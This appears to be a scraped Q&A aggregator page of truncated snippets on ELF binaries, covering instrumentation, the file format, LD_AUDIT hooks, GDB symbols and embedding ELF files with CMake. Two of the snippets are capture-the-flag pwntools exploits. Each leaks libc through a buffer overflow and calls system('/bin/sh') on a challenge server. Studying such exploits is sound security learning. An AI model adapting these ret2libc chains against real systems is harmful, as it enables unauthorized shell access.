elf

How to extend a ELF binary

有些话、适合烂在心里 submitted on 2020-03-28 03:55:00
Question: I am writing a small instrumentation tool. I must insert the instrumentation routine within the binary file. A good approach should be to insert those routines in a separate code segment and a separate data segment; could you explain how to accomplish this? Furthermore, how can I modify the size of the code segment in the original file? Best, Answer 1: I must insert the instrumentation routine within the binary file. A good approach should be to insert those routines in a separate code segment and a

Analysis of the ELF file format

核能气质少年 submitted on 2020-03-26 09:36:47
Copied from: https://blog.csdn.net/mergerly/article/details/94585901 1. Introduction to ELF files. First, you need to know that there are three kinds of so-called object files: Relocatable files: these are the .o files produced by the assembler. The linker (link editor) takes one or more relocatable object files as input and, after link processing, produces an executable object file (Executable file) or a shareable object file (Shared object file). We can use the ar tool to archive many .o relocatable object files into a .a static library file. You should already be familiar with how a relocatable file is produced; see our related basic-concepts articles and JulWiki. Also, it can be said in advance that our kernel loadable module .ko files are relocatable object files as well. Executable files: we have seen plenty of these. The text editor vi, the debugging tool gdb, the mp3 player mplayer, and so on are all executable object files. You should already know that in our Linux system there are two kinds of executable things

Hook function to shared library unloading

狂风中的少年 submitted on 2020-02-22 07:34:25
Question: I want to add a hook function, which will be called when a shared library is unloaded. The library is linked at compilation. Is it possible to do such a thing? Maybe gcc has a flag for it? I saw a similar solution for loading a library at runtime, but it doesn't meet my expectations. Answer 1: Solaris and GNU/Linux support the LD_AUDIT interface in their dynamic linkers. You need to load an auditor module which implements the la_objclose callback function: Runtime Linker Auditing Interface The implementation can

Where are GDB symbols coming from?

淺唱寂寞╮ submitted on 2020-02-14 06:28:35
Question: When I load Fedora 28's /usr/bin/ls file into GDB, I can access the symbol abformat_init, even though it is not present as a string nor in the symbol table of the binary file. $ file /usr/bin/ls /usr/bin/ls: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d6d0ea6be508665f5586e90a30819d090710842f, stripped, too many notes (256) $ readelf -S /usr/bin/ls | grep abformat $ nm /usr/bin/ls nm:

铁人三项(第五赛区)_2018_rop

和自甴很熟 submitted on 2020-02-11 00:07:36
Using pwntools' DynELF from pwn import * r=remote('node3.buuoj.cn',29392) e=ELF('./2018_rop') write_plt=e.plt['write'] read_plt=e.plt['read'] main_addr=e.symbols['main'] bss_addr=e.symbols['__bss_start'] def leak(address): payload1='a'*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0x1)+p32(address)+p32(0x4) r.sendline(payload1) leak_address=r.recv(4) return leak_address d=DynELF(leak,elf=ELF('./2018_rop')) sys_addr=d.lookup('system','libc') payload2='a'*(0x88+0x4)+p32(read_plt)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload2) r.sendline('/bin/sh') payload3='a'*(0x88+0x4)+p32(sys

xdctf2015_pwn200

自闭症网瘾萝莉.ら submitted on 2020-02-09 18:55:57
Looking up to the experts from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x804851c bss_addr=elf.symbols['__bss_start'] def leak(addr): r.recvline() payload='a'*0x6c+'b'*0x4+p32(write_addr)+p32(main_addr)+p32(1)+p32(addr)+p32(0x4) r.sendline(payload) leak_addr=r.recv(4) return leak_addr d=DynELF(leak,elf=ELF('./bof')) system_addr=d.lookup('system','libc') payload='a'*0x6c+'b'*0x4+p32(read_addr)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload) r.sendline('/bin/sh') payload='a'*0x6c+'b'*0x4+p32(system

JZ2440 bare-metal LED lighting [study notes]

痞子三分冷 submitted on 2020-01-30 05:45:23
Platform: jz2440. Author: 庄泽彬 (reposting welcome; please credit the author). Note: study notes from 韦东山's first-stage video course. 1. We start with the first experiment: lighting the LED on the board in assembly language. 1.1 LED schematic: from the schematic below, LED1 is connected to the chip's GPF4 pin. 1.2 Configuration of the relevant GPIO registers: to light the LED, the corresponding port must be configured as an output and driven low. According to the chip manual, to make GPF4 output a low level, set the corresponding bits of the GPFCON register to 01 (output mode), then set the corresponding bit of GPFDAT to 0 to output a low level. 1.3 The code: led_on.S file
.text
.global _start
_start:
LDR R0,=0x56000050 @ set R0 to the GPFCON register
@ used to configure the port's input/output state
mov R1,#0x00000100
str R1,[R0] @ set the GPF4 port as an output
ldr R0,=0x56000054 @ set R0 to the GPFDAT register
@ used to set the port's output level (high/low)
mov R1,#0x00000100
str R1,[R0] @ output a low level
MAIN_LOOP:
B MAIN_LOOP
Makefile file
led_on.bin:led_on.S
arm-linux-gcc -g -c -o led_on

__do_global_dtors_aux and __do_global_ctors_aux

你说的曾经没有我的故事 submitted on 2020-01-29 04:54:24
Question: I disassembled a simple program written in C++ and there are these two function names. I guess that ctor means constructor and dtor means destructor, and the word global maybe means that they create and destroy global objects. I cannot guess the name aux. What do these two functions do? Answer 1: The addresses of constructors and destructors of static objects are each stored in a different section in the ELF executable. For the constructors there is a section called .CTORS and for the destructors there

CMake: Embed ELF into executable

谁说胖子不能爱 submitted on 2020-01-22 09:58:09
Question: I have a project that needs access to an ELF file embedded into the executable in a special section. I was handcrafting Makefiles before and simply had a shell script where I used objcopy to copy the target I wanted to embed into an .o file, then linked this file into the executable. # Create a new section and copy the binary there ($1=input $2=output name) objcopy --input-target binary --output-target elf64-x86-64 \ --binary-architecture i386 $1 $2.o Now I want to get rid of the custom